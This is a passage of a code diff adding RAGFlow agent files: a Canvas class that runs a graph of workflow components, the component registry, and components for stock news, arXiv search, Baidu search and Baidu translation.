+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ import json
18
+ from abc import ABC
19
+ from copy import deepcopy
20
+ from functools import partial
21
+
22
+ import pandas as pd
23
+
24
+ from agent.component import component_class
25
+ from agent.component.base import ComponentBase
26
+
27
+
28
+ class Canvas(ABC):
29
+ """
30
+ dsl = {
31
+ "components": {
32
+ "begin": {
33
+ "obj":{
34
+ "component_name": "Begin",
35
+ "params": {},
36
+ },
37
+ "downstream": ["answer_0"],
38
+ "upstream": [],
39
+ },
40
+ "answer_0": {
41
+ "obj": {
42
+ "component_name": "Answer",
43
+ "params": {}
44
+ },
45
+ "downstream": ["retrieval_0"],
46
+ "upstream": ["begin", "generate_0"],
47
+ },
48
+ "retrieval_0": {
49
+ "obj": {
50
+ "component_name": "Retrieval",
51
+ "params": {}
52
+ },
53
+ "downstream": ["generate_0"],
54
+ "upstream": ["answer_0"],
55
+ },
56
+ "generate_0": {
57
+ "obj": {
58
+ "component_name": "Generate",
59
+ "params": {}
60
+ },
61
+ "downstream": ["answer_0"],
62
+ "upstream": ["retrieval_0"],
63
+ }
64
+ },
65
+ "history": [],
66
+ "messages": [],
67
+ "reference": [],
68
+ "path": [["begin"]],
69
+ "answer": []
70
+ }
71
+ """
72
+
73
+ def __init__(self, dsl: str, tenant_id=None):
74
+ self.path = []
75
+ self.history = []
76
+ self.messages = []
77
+ self.answer = []
78
+ self.components = {}
79
+ self.dsl = json.loads(dsl) if dsl else {
80
+ "components": {
81
+ "begin": {
82
+ "obj": {
83
+ "component_name": "Begin",
84
+ "params": {
85
+ "prologue": "Hi there!"
86
+ }
87
+ },
88
+ "downstream": [],
89
+ "upstream": [],
90
+ "parent_id": ""
91
+ }
92
+ },
93
+ "history": [],
94
+ "messages": [],
95
+ "reference": [],
96
+ "path": [],
97
+ "answer": []
98
+ }
99
+ self._tenant_id = tenant_id
100
+ self._embed_id = ""
101
+ self.load()
102
+
103
+ def load(self):
104
+ self.components = self.dsl["components"]
105
+ cpn_nms = set([])
106
+ for k, cpn in self.components.items():
107
+ cpn_nms.add(cpn["obj"]["component_name"])
108
+
109
+ assert "Begin" in cpn_nms, "There have to be an 'Begin' component."
110
+ assert "Answer" in cpn_nms, "There have to be an 'Answer' component."
111
+
112
+ for k, cpn in self.components.items():
113
+ cpn_nms.add(cpn["obj"]["component_name"])
114
+ param = component_class(cpn["obj"]["component_name"] + "Param")()
115
+ param.update(cpn["obj"]["params"])
116
+ param.check()
117
+ cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
118
+ if cpn["obj"].component_name == "Categorize":
119
+ for _, desc in param.category_description.items():
120
+ if desc["to"] not in cpn["downstream"]:
121
+ cpn["downstream"].append(desc["to"])
122
+
123
+ self.path = self.dsl["path"]
124
+ self.history = self.dsl["history"]
125
+ self.messages = self.dsl["messages"]
126
+ self.answer = self.dsl["answer"]
127
+ self.reference = self.dsl["reference"]
128
+ self._embed_id = self.dsl.get("embed_id", "")
129
+
130
+ def __str__(self):
131
+ self.dsl["path"] = self.path
132
+ self.dsl["history"] = self.history
133
+ self.dsl["messages"] = self.messages
134
+ self.dsl["answer"] = self.answer
135
+ self.dsl["reference"] = self.reference
136
+ self.dsl["embed_id"] = self._embed_id
137
+ dsl = {
138
+ "components": {}
139
+ }
140
+ for k in self.dsl.keys():
141
+ if k in ["components"]:
142
+ continue
143
+ dsl[k] = deepcopy(self.dsl[k])
144
+
145
+ for k, cpn in self.components.items():
146
+ if k not in dsl["components"]:
147
+ dsl["components"][k] = {}
148
+ for c in cpn.keys():
149
+ if c == "obj":
150
+ dsl["components"][k][c] = json.loads(str(cpn["obj"]))
151
+ continue
152
+ dsl["components"][k][c] = deepcopy(cpn[c])
153
+ return json.dumps(dsl, ensure_ascii=False)
154
+
155
+ def reset(self):
156
+ self.path = []
157
+ self.history = []
158
+ self.messages = []
159
+ self.answer = []
160
+ self.reference = []
161
+ for k, cpn in self.components.items():
162
+ self.components[k]["obj"].reset()
163
+ self._embed_id = ""
164
+
165
+ def get_compnent_name(self, cid):
166
+ for n in self.dsl["graph"]["nodes"]:
167
+ if cid == n["id"]:
168
+ return n["data"]["name"]
169
+ return ""
170
+
171
+ def run(self, **kwargs):
172
+ if self.answer:
173
+ cpn_id = self.answer[0]
174
+ self.answer.pop(0)
175
+ try:
176
+ ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
177
+ except Exception as e:
178
+ ans = ComponentBase.be_output(str(e))
179
+ self.path[-1].append(cpn_id)
180
+ if kwargs.get("stream"):
181
+ for an in ans():
182
+ yield an
183
+ else:
184
+ yield ans
185
+ return
186
+
187
+ if not self.path:
188
+ self.components["begin"]["obj"].run(self.history, **kwargs)
189
+ self.path.append(["begin"])
190
+
191
+ self.path.append([])
192
+
193
+ ran = -1
194
+ waiting = []
195
+ without_dependent_checking = []
196
+
197
+ def prepare2run(cpns):
198
+ nonlocal ran, ans
199
+ for c in cpns:
200
+ if self.path[-1] and c == self.path[-1][-1]:
201
+ continue
202
+ cpn = self.components[c]["obj"]
203
+ if cpn.component_name == "Answer":
204
+ self.answer.append(c)
205
+ else:
206
+ logging.debug(f"Canvas.prepare2run: {c}")
207
+ if c not in without_dependent_checking:
208
+ cpids = cpn.get_dependent_components()
209
+ if any([cc not in self.path[-1] for cc in cpids]):
210
+ if c not in waiting:
211
+ waiting.append(c)
212
+ continue
213
+ yield "*'{}'* is running...🕞".format(self.get_compnent_name(c))
214
+
215
+ if cpn.component_name.lower() == "iteration":
216
+ st_cpn = cpn.get_start()
217
+ assert st_cpn, "Start component not found for Iteration."
218
+ if not st_cpn["obj"].end():
219
+ cpn = st_cpn["obj"]
220
+ c = cpn._id
221
+
222
+ try:
223
+ ans = cpn.run(self.history, **kwargs)
224
+ except Exception as e:
225
+ logging.exception(f"Canvas.run got exception: {e}")
226
+ self.path[-1].append(c)
227
+ ran += 1
228
+ raise e
229
+ self.path[-1].append(c)
230
+
231
+ ran += 1
232
+
233
+ downstream = self.components[self.path[-2][-1]]["downstream"]
234
+ if not downstream and self.components[self.path[-2][-1]].get("parent_id"):
235
+ cid = self.path[-2][-1]
236
+ pid = self.components[cid]["parent_id"]
237
+ o, _ = self.components[cid]["obj"].output(allow_partial=False)
238
+ oo, _ = self.components[pid]["obj"].output(allow_partial=False)
239
+ self.components[pid]["obj"].set(pd.concat([oo, o], ignore_index=True))
240
+ downstream = [pid]
241
+
242
+ for m in prepare2run(downstream):
243
+ yield {"content": m, "running_status": True}
244
+
245
+ while 0 <= ran < len(self.path[-1]):
246
+ logging.debug(f"Canvas.run: {ran} {self.path}")
247
+ cpn_id = self.path[-1][ran]
248
+ cpn = self.get_component(cpn_id)
249
+ if not any([cpn["downstream"], cpn.get("parent_id"), waiting]):
250
+ break
251
+
252
+ loop = self._find_loop()
253
+ if loop:
254
+ raise OverflowError(f"Too much loops: {loop}")
255
+
256
+ if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
257
+ switch_out = cpn["obj"].output()[1].iloc[0, 0]
258
+ assert switch_out in self.components, \
259
+ "{}'s output: {} not valid.".format(cpn_id, switch_out)
260
+ for m in prepare2run([switch_out]):
261
+ yield {"content": m, "running_status": True}
262
+ continue
263
+
264
+ downstream = cpn["downstream"]
265
+ if not downstream and cpn.get("parent_id"):
266
+ pid = cpn["parent_id"]
267
+ _, o = cpn["obj"].output(allow_partial=False)
268
+ _, oo = self.components[pid]["obj"].output(allow_partial=False)
269
+ self.components[pid]["obj"].set_output(pd.concat([oo.dropna(axis=1), o.dropna(axis=1)], ignore_index=True))
270
+ downstream = [pid]
271
+
272
+ for m in prepare2run(downstream):
273
+ yield {"content": m, "running_status": True}
274
+
275
+ if ran >= len(self.path[-1]) and waiting:
276
+ without_dependent_checking = waiting
277
+ waiting = []
278
+ for m in prepare2run(without_dependent_checking):
279
+ yield {"content": m, "running_status": True}
280
+ without_dependent_checking = []
281
+ ran -= 1
282
+
283
+ if self.answer:
284
+ cpn_id = self.answer[0]
285
+ self.answer.pop(0)
286
+ ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
287
+ self.path[-1].append(cpn_id)
288
+ if kwargs.get("stream"):
289
+ assert isinstance(ans, partial)
290
+ for an in ans():
291
+ yield an
292
+ else:
293
+ yield ans
294
+
295
+ else:
296
+ raise Exception("The dialog flow has no way to interact with you. Please add an 'Interact' component to the end of the flow.")
297
+
298
+ def get_component(self, cpn_id):
299
+ return self.components[cpn_id]
300
+
301
+ def get_tenant_id(self):
302
+ return self._tenant_id
303
+
304
+ def get_history(self, window_size):
305
+ convs = []
306
+ for role, obj in self.history[window_size * -1:]:
307
+ if isinstance(obj, list) and obj and all([isinstance(o, dict) for o in obj]):
308
+ convs.append({"role": role, "content": '\n'.join([str(s.get("content", "")) for s in obj])})
309
+ else:
310
+ convs.append({"role": role, "content": str(obj)})
311
+ return convs
312
+
313
+ def add_user_input(self, question):
314
+ self.history.append(("user", question))
315
+
316
+ def set_embedding_model(self, embed_id):
317
+ self._embed_id = embed_id
318
+
319
+ def get_embedding_model(self):
320
+ return self._embed_id
321
+
322
+ def _find_loop(self, max_loops=6):
323
+ path = self.path[-1][::-1]
324
+ if len(path) < 2:
325
+ return False
326
+
327
+ for i in range(len(path)):
328
+ if path[i].lower().find("answer") == 0 or path[i].lower().find("iterationitem") == 0:
329
+ path = path[:i]
330
+ break
331
+
332
+ if len(path) < 2:
333
+ return False
334
+
335
+ for loc in range(2, len(path) // 2):
336
+ pat = ",".join(path[0:loc])
337
+ path_str = ",".join(path)
338
+ if len(pat) >= len(path_str):
339
+ return False
340
+ loop = max_loops
341
+ while path_str.find(pat) == 0 and loop >= 0:
342
+ loop -= 1
343
+ if len(pat)+1 >= len(path_str):
344
+ return False
345
+ path_str = path_str[len(pat)+1:]
346
+ if loop < 0:
347
+ pat = " => ".join([p.split(":")[0] for p in path[0:loc]])
348
+ return pat + " => " + pat
349
+
350
+ return False
351
+
352
+ def get_prologue(self):
353
+ return self.components["begin"]["obj"]._param.prologue
354
+
355
+ def set_global_param(self, **kwargs):
356
+ for k, v in kwargs.items():
357
+ for q in self.components["begin"]["obj"]._param.query:
358
+ if k != q["key"]:
359
+ continue
360
+ q["value"] = v
361
+
362
+ def get_preset_param(self):
363
+ return self.components["begin"]["obj"]._param.query
364
+
365
+ def get_component_input_elements(self, cpnnm):
366
+ return self.components[cpnnm]["obj"].get_input_elements()
ragflow-main/agent/component/__init__.py ADDED
@@ -0,0 +1,133 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ import importlib
18
+ from .begin import Begin, BeginParam
19
+ from .generate import Generate, GenerateParam
20
+ from .retrieval import Retrieval, RetrievalParam
21
+ from .answer import Answer, AnswerParam
22
+ from .categorize import Categorize, CategorizeParam
23
+ from .switch import Switch, SwitchParam
24
+ from .relevant import Relevant, RelevantParam
25
+ from .message import Message, MessageParam
26
+ from .rewrite import RewriteQuestion, RewriteQuestionParam
27
+ from .keyword import KeywordExtract, KeywordExtractParam
28
+ from .concentrator import Concentrator, ConcentratorParam
29
+ from .baidu import Baidu, BaiduParam
30
+ from .duckduckgo import DuckDuckGo, DuckDuckGoParam
31
+ from .wikipedia import Wikipedia, WikipediaParam
32
+ from .pubmed import PubMed, PubMedParam
33
+ from .arxiv import ArXiv, ArXivParam
34
+ from .google import Google, GoogleParam
35
+ from .bing import Bing, BingParam
36
+ from .googlescholar import GoogleScholar, GoogleScholarParam
37
+ from .deepl import DeepL, DeepLParam
38
+ from .github import GitHub, GitHubParam
39
+ from .baidufanyi import BaiduFanyi, BaiduFanyiParam
40
+ from .qweather import QWeather, QWeatherParam
41
+ from .exesql import ExeSQL, ExeSQLParam
42
+ from .yahoofinance import YahooFinance, YahooFinanceParam
43
+ from .wencai import WenCai, WenCaiParam
44
+ from .jin10 import Jin10, Jin10Param
45
+ from .tushare import TuShare, TuShareParam
46
+ from .akshare import AkShare, AkShareParam
47
+ from .crawler import Crawler, CrawlerParam
48
+ from .invoke import Invoke, InvokeParam
49
+ from .template import Template, TemplateParam
50
+ from .email import Email, EmailParam
51
+ from .iteration import Iteration, IterationParam
52
+ from .iterationitem import IterationItem, IterationItemParam
53
+
54
+
55
+ def component_class(class_name):
56
+ m = importlib.import_module("agent.component")
57
+ c = getattr(m, class_name)
58
+ return c
59
+
60
+
61
+ __all__ = [
62
+ "Begin",
63
+ "BeginParam",
64
+ "Generate",
65
+ "GenerateParam",
66
+ "Retrieval",
67
+ "RetrievalParam",
68
+ "Answer",
69
+ "AnswerParam",
70
+ "Categorize",
71
+ "CategorizeParam",
72
+ "Switch",
73
+ "SwitchParam",
74
+ "Relevant",
75
+ "RelevantParam",
76
+ "Message",
77
+ "MessageParam",
78
+ "RewriteQuestion",
79
+ "RewriteQuestionParam",
80
+ "KeywordExtract",
81
+ "KeywordExtractParam",
82
+ "Concentrator",
83
+ "ConcentratorParam",
84
+ "Baidu",
85
+ "BaiduParam",
86
+ "DuckDuckGo",
87
+ "DuckDuckGoParam",
88
+ "Wikipedia",
89
+ "WikipediaParam",
90
+ "PubMed",
91
+ "PubMedParam",
92
+ "ArXiv",
93
+ "ArXivParam",
94
+ "Google",
95
+ "GoogleParam",
96
+ "Bing",
97
+ "BingParam",
98
+ "GoogleScholar",
99
+ "GoogleScholarParam",
100
+ "DeepL",
101
+ "DeepLParam",
102
+ "GitHub",
103
+ "GitHubParam",
104
+ "BaiduFanyi",
105
+ "BaiduFanyiParam",
106
+ "QWeather",
107
+ "QWeatherParam",
108
+ "ExeSQL",
109
+ "ExeSQLParam",
110
+ "YahooFinance",
111
+ "YahooFinanceParam",
112
+ "WenCai",
113
+ "WenCaiParam",
114
+ "Jin10",
115
+ "Jin10Param",
116
+ "TuShare",
117
+ "TuShareParam",
118
+ "AkShare",
119
+ "AkShareParam",
120
+ "Crawler",
121
+ "CrawlerParam",
122
+ "Invoke",
123
+ "InvokeParam",
124
+ "Iteration",
125
+ "IterationParam",
126
+ "IterationItem",
127
+ "IterationItemParam",
128
+ "Template",
129
+ "TemplateParam",
130
+ "Email",
131
+ "EmailParam",
132
+ "component_class"
133
+ ]
ragflow-main/agent/component/akshare.py ADDED
@@ -0,0 +1,56 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import pandas as pd
18
+ from agent.component.base import ComponentBase, ComponentParamBase
19
+
20
+
21
+ class AkShareParam(ComponentParamBase):
22
+ """
23
+ Define the AkShare component parameters.
24
+ """
25
+
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.top_n = 10
29
+
30
+ def check(self):
31
+ self.check_positive_integer(self.top_n, "Top N")
32
+
33
+
34
+ class AkShare(ComponentBase, ABC):
35
+ component_name = "AkShare"
36
+
37
+ def _run(self, history, **kwargs):
38
+ import akshare as ak
39
+ ans = self.get_input()
40
+ ans = ",".join(ans["content"]) if "content" in ans else ""
41
+ if not ans:
42
+ return AkShare.be_output("")
43
+
44
+ try:
45
+ ak_res = []
46
+ stock_news_em_df = ak.stock_news_em(symbol=ans)
47
+ stock_news_em_df = stock_news_em_df.head(self._param.top_n)
48
+ ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: ' + i[
49
+ "新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]} for index, i in stock_news_em_df.iterrows()]
50
+ except Exception as e:
51
+ return AkShare.be_output("**ERROR**: " + str(e))
52
+
53
+ if not ak_res:
54
+ return AkShare.be_output("")
55
+
56
+ return pd.DataFrame(ak_res)
ragflow-main/agent/component/answer.py ADDED
@@ -0,0 +1,89 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import random
17
+ from abc import ABC
18
+ from functools import partial
19
+ from typing import Tuple, Union
20
+
21
+ import pandas as pd
22
+
23
+ from agent.component.base import ComponentBase, ComponentParamBase
24
+
25
+
26
+ class AnswerParam(ComponentParamBase):
27
+
28
+ """
29
+ Define the Answer component parameters.
30
+ """
31
+ def __init__(self):
32
+ super().__init__()
33
+ self.post_answers = []
34
+
35
+ def check(self):
36
+ return True
37
+
38
+
39
+ class Answer(ComponentBase, ABC):
40
+ component_name = "Answer"
41
+
42
+ def _run(self, history, **kwargs):
43
+ if kwargs.get("stream"):
44
+ return partial(self.stream_output)
45
+
46
+ ans = self.get_input()
47
+ if self._param.post_answers:
48
+ ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
49
+ return ans
50
+
51
+ def stream_output(self):
52
+ res = None
53
+ if hasattr(self, "exception") and self.exception:
54
+ res = {"content": str(self.exception)}
55
+ self.exception = None
56
+ yield res
57
+ self.set_output(res)
58
+ return
59
+
60
+ stream = self.get_stream_input()
61
+ if isinstance(stream, pd.DataFrame):
62
+ res = stream
63
+ answer = ""
64
+ for ii, row in stream.iterrows():
65
+ answer += row.to_dict()["content"]
66
+ yield {"content": answer}
67
+ else:
68
+ for st in stream():
69
+ res = st
70
+ yield st
71
+ if self._param.post_answers:
72
+ res["content"] += random.choice(self._param.post_answers)
73
+ yield res
74
+
75
+ self.set_output(res)
76
+
77
+ def set_exception(self, e):
78
+ self.exception = e
79
+
80
+ def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
81
+ if allow_partial:
82
+ return super.output()
83
+
84
+ for r, c in self._canvas.history[::-1]:
85
+ if r == "user":
86
+ return self._param.output_var_name, pd.DataFrame([{"content": c}])
87
+
88
+ self._param.output_var_name, pd.DataFrame([])
89
+
ragflow-main/agent/component/arxiv.py ADDED
@@ -0,0 +1,68 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import arxiv
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+ class ArXivParam(ComponentParamBase):
23
+ """
24
+ Define the ArXiv component parameters.
25
+ """
26
+
27
+ def __init__(self):
28
+ super().__init__()
29
+ self.top_n = 6
30
+ self.sort_by = 'submittedDate'
31
+
32
+ def check(self):
33
+ self.check_positive_integer(self.top_n, "Top N")
34
+ self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
35
+ ['submittedDate', 'lastUpdatedDate', 'relevance'])
36
+
37
+
38
+ class ArXiv(ComponentBase, ABC):
39
+ component_name = "ArXiv"
40
+
41
+ def _run(self, history, **kwargs):
42
+ ans = self.get_input()
43
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
44
+ if not ans:
45
+ return ArXiv.be_output("")
46
+
47
+ try:
48
+ sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
49
+ "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
50
+ 'submittedDate': arxiv.SortCriterion.SubmittedDate}
51
+ arxiv_client = arxiv.Client()
52
+ search = arxiv.Search(
53
+ query=ans,
54
+ max_results=self._param.top_n,
55
+ sort_by=sort_choices[self._param.sort_by]
56
+ )
57
+ arxiv_res = [
58
+ {"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary} for
59
+ i in list(arxiv_client.results(search))]
60
+ except Exception as e:
61
+ return ArXiv.be_output("**ERROR**: " + str(e))
62
+
63
+ if not arxiv_res:
64
+ return ArXiv.be_output("")
65
+
66
+ df = pd.DataFrame(arxiv_res)
67
+ logging.debug(f"df: {str(df)}")
68
+ return df
ragflow-main/agent/component/baidu.py ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ import requests
20
+ import re
21
+ from agent.component.base import ComponentBase, ComponentParamBase
22
+
23
+
24
+ class BaiduParam(ComponentParamBase):
25
+ """
26
+ Define the Baidu component parameters.
27
+ """
28
+
29
+ def __init__(self):
30
+ super().__init__()
31
+ self.top_n = 10
32
+
33
+ def check(self):
34
+ self.check_positive_integer(self.top_n, "Top N")
35
+
36
+
37
+ class Baidu(ComponentBase, ABC):
38
+ component_name = "Baidu"
39
+
40
+ def _run(self, history, **kwargs):
41
+ ans = self.get_input()
42
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
43
+ if not ans:
44
+ return Baidu.be_output("")
45
+
46
+ try:
47
+ url = 'http://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
48
+ headers = {
49
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
50
+ response = requests.get(url=url, headers=headers)
51
+
52
+ url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
53
+ title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
54
+ body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
55
+ baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)} for
56
+ url, title, body in zip(url_res, title_res, body_res)]
57
+ del body_res, url_res, title_res
58
+ except Exception as e:
59
+ return Baidu.be_output("**ERROR**: " + str(e))
60
+
61
+ if not baidu_res:
62
+ return Baidu.be_output("")
63
+
64
+ df = pd.DataFrame(baidu_res)
65
+ logging.debug(f"df: {str(df)}")
66
+ return df
67
+
ragflow-main/agent/component/baidufanyi.py ADDED
@@ -0,0 +1,96 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import random
17
+ from abc import ABC
18
+ import requests
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from hashlib import md5
21
+
22
+
23
+ class BaiduFanyiParam(ComponentParamBase):
24
+ """
25
+ Define the BaiduFanyi component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.appid = "xxx"
31
+ self.secret_key = "xxx"
32
+ self.trans_type = 'translate'
33
+ self.parameters = []
34
+ self.source_lang = 'auto'
35
+ self.target_lang = 'auto'
36
+ self.domain = 'finance'
37
+
38
+ def check(self):
39
+ self.check_empty(self.appid, "BaiduFanyi APPID")
40
+ self.check_empty(self.secret_key, "BaiduFanyi Secret Key")
41
+ self.check_valid_value(self.trans_type, "Translate type", ['translate', 'fieldtranslate'])
42
+ self.check_valid_value(self.source_lang, "Source language",
43
+ ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
44
+ 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
45
+ 'hu', 'cht', 'vie'])
46
+ self.check_valid_value(self.target_lang, "Target language",
47
+ ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
48
+ 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
49
+ 'hu', 'cht', 'vie'])
50
+ self.check_valid_value(self.domain, "Translate field",
51
+ ['it', 'finance', 'machinery', 'senimed', 'novel', 'academic', 'aerospace', 'wiki',
52
+ 'news', 'law', 'contract'])
53
+
54
+
55
+ class BaiduFanyi(ComponentBase, ABC):
56
+ component_name = "BaiduFanyi"
57
+
58
+ def _run(self, history, **kwargs):
59
+
60
+ ans = self.get_input()
61
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
62
+ if not ans:
63
+ return BaiduFanyi.be_output("")
64
+
65
+ try:
66
+ source_lang = self._param.source_lang
67
+ target_lang = self._param.target_lang
68
+ appid = self._param.appid
69
+ salt = random.randint(32768, 65536)
70
+ secret_key = self._param.secret_key
71
+
72
+ if self._param.trans_type == 'translate':
73
+ sign = md5((appid + ans + salt + secret_key).encode('utf-8')).hexdigest()
74
+ url = 'http://api.fanyi.baidu.com/api/trans/vip/translate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&sign=' + sign
75
+ headers = {"Content-Type": "application/x-www-form-urlencoded"}
76
+ response = requests.post(url=url, headers=headers).json()
77
+
78
+ if response.get('error_code'):
79
+ BaiduFanyi.be_output("**Error**:" + response['error_msg'])
80
+
81
+ return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
82
